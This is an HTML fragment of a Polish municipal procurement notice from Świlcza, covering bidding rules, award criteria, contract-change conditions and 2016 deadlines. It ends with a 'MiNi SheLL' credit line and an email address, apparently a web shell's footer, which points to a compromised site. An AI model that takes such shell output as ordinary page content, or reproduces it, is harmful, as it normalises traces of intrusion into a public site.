                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br /><br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br /><br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br /><br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br /></div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej? <i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> :
              </b>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br /><br /><b>
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              </b><br /><b>Informacje dotyczące przebiegu aukcji elektronicznej: </b><br /><b>Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): </b><br /><b>Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: </b><br /><b>Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: </b><br /><b>Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: </b><div style="padding-left: 20px"><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin nieodpłatnego usunięcia braków, błędów, innych nieprawidłowości, wad w opracowanej dokumentacji</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp (przetarg nieograniczony)</b><br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne (jeżeli dotyczy)</b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br /><b> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna</b><br /><div style="padding-left: 20px"></div><b> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej</b><br /><div style="padding-left: 20px"></div><b>Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych</b><br /><div style="padding-left: 20px"></div><b> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień</b><br /><div style="padding-left: 20px"></div><b> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: </b><div style="padding-left: 20px"><br /><b>Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:</b></div><b> Termin otwarcia licytacji elektronicznej</b><br /><div style="padding-left: 20px"></div><b> Termin i warunki zamknięcia licytacji elektronicznej</b><br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy
              <br /><div style="padding-left: 20px"></div><br /><b> Wymagania dotyczące zabezpieczenia należytego wykonania umowy</b><br /><div style="padding-left: 20px"></div><br /><b>Informacje dodatkowe:</b><br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Możliwe zmiany w umowie: Strony mają prawo do przedłużenia terminu realizacji przedmiotu zamówienia o okres trwania przyczyn, z powodu których będzie zagrożone dotrzymanie terminu zakończenia umowy, np. wystąpią opóźnienia w dokonaniu określonych czynności lub ich zaniechanie przez właściwe organy administracji państwowej, które nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność, np. przedłużająca się procedura związana z opublikowaniem uchwały Rady Gminy Świlcza Nr XXVII/183/2016 z dnia 30 lipca 2016 r. w sprawie zmiany miejscowego planu zagospodarowania przestrzennego 
Nr 3/2006 w miejscowości Świlcza i Rudna Wielka w Dzienniku Urzędowym Województwa Podkarpackiego.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br />
              Środki służące ochronie informacji o charakterze poufnym
              <br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b>12/08/2016 godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br /><b>Język lub języki, w jakich  muszą być sporządzone wnioski o dopuszczenie do udziału w postępowaniu lub oferty</b><br /><b>IV.6.3) Termin związania ofertą: </b>
                do: 12/09/2016<br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Z uwagi na brak możliwości określenia w ogłoszeniu o zamówieniu terminu 
związania ofertą określanego w pkt. IV.6.3) zgodnego z ustawą Prawo zamówień 
publicznych spowodowanego niezgodnością formularza BZP z Rozporządzeniem 
Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie wzorów ogłoszeń 
zamieszczanych w Biuletynie Zamówień Publicznych (Dz. U. poz. 1127) 
Zamawiający informuje że termin określony w pkt IV.6.3) nie jest wiążący dla 
Wykonawców oraz że: Wykonawca związany jest ofertą przez okres 30 dni. Bieg 
terminu związania ofertą rozpoczyna się wraz z upływem terminu składania ofert. 
Wykonawca samodzielnie lub na wniosek zamawiającego może przedłużyć termin 
związania ofertą, z tym że zamawiający może tylko raz, co najmniej na 3 dni przed 
upływem terminu związania ofertą, zwrócić się do wykonawców o wyrażenie 
zgody na przedłużenie tego terminu o oznaczony okres - nie dłuższy jednak niż 60 dni.
Uwaga!
Zamawiający zastrzega sobie, że w przypadku nieopublikowania w Dzienniku Urzędowym  Województwa Podkarpackiego uchwały Rady Gminy Świlcza 
Nr XXVII/183/2016 z dnia 30 lipca 2016 r. w sprawie zmiany miejscowego planu zagospodarowania przestrzennego Nr 3/2006 w miejscowości Świlcza i Rudna Wielka może nastąpić rezygnacja z realizacji przedmiotu zamówienia.
</div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com